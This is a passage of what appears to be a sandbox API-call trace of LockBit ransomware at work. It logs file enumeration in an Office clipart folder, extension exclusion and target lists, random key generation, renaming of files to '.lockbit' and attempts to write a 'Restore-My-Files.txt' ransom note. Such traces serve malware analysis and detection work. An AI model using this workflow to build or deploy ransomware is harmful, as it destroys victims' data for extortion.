"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.903] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.903] malloc (_Size=0x40068) returned 0x3df0008 [0147.903] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=30522) returned 1 [0147.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.905] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.909] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.909] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.909] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.912] free (_Block=0x1fa2ed8) [0147.912] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.912] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.912] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.913] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8b8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185818.WMF", cAlternateFileName="")) returned 1 [0147.913] lstrcmpiW (lpString1=".", lpString2="J0185818.WMF") returned -1 [0147.913] lstrcmpiW (lpString1="..", lpString2="J0185818.WMF") returned -1 [0147.913] PathFindExtensionW (pszPath="J0185818.WMF") returned=".WMF" [0147.913] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.913] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.914] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.914] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185818.WMF") returned 1 [0147.915] lstrcmpiW (lpString1="ntldr", lpString2="J0185818.WMF") returned 1 [0147.915] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185818.WMF") returned 1 [0147.915] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185818.WMF") returned -1 [0147.915] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185818.WMF") returned -1 [0147.915] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185818.WMF") returned 1 [0147.915] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185818.WMF") returned -1 [0147.915] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.915] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned=".WMF" [0147.915] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.915] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.915] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.916] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.916] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF.lockbit") returned 72 [0147.916] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.917] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.917] malloc (_Size=0x40068) returned 0x3df0008 [0147.917] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=35726) returned 1 [0147.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.919] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.923] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.923] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.923] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.926] free (_Block=0x1fa2ed8) [0147.926] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.926] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.926] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.927] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185828.WMF", cAlternateFileName="")) returned 1 [0147.927] lstrcmpiW (lpString1=".", lpString2="J0185828.WMF") returned -1 [0147.927] lstrcmpiW (lpString1="..", lpString2="J0185828.WMF") returned -1 [0147.927] PathFindExtensionW (pszPath="J0185828.WMF") returned=".WMF" [0147.927] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.927] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.928] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.928] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185828.WMF") returned 1 [0147.929] lstrcmpiW (lpString1="ntldr", lpString2="J0185828.WMF") returned 1 [0147.929] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185828.WMF") returned 1 [0147.929] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185828.WMF") returned -1 [0147.929] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185828.WMF") returned -1 [0147.929] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185828.WMF") returned 1 [0147.929] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185828.WMF") returned -1 [0147.929] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.929] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned=".WMF" [0147.929] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.929] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.929] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.930] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.930] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF.lockbit") returned 72 [0147.930] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185828.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.931] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.931] malloc (_Size=0x40068) returned 0x3df0008 [0147.931] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7796) returned 1 [0147.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.932] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.933] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.938] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.938] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.942] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0147.942] free (_Block=0x1fa2ed8) [0147.942] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.942] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.942] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2182, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185834.WMF", cAlternateFileName="")) returned 1 [0147.942] lstrcmpiW (lpString1=".", lpString2="J0185834.WMF") returned -1 [0147.942] lstrcmpiW (lpString1="..", lpString2="J0185834.WMF") returned -1 [0147.942] PathFindExtensionW (pszPath="J0185834.WMF") returned=".WMF" [0147.943] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.943] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.944] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.944] lstrcmpiW 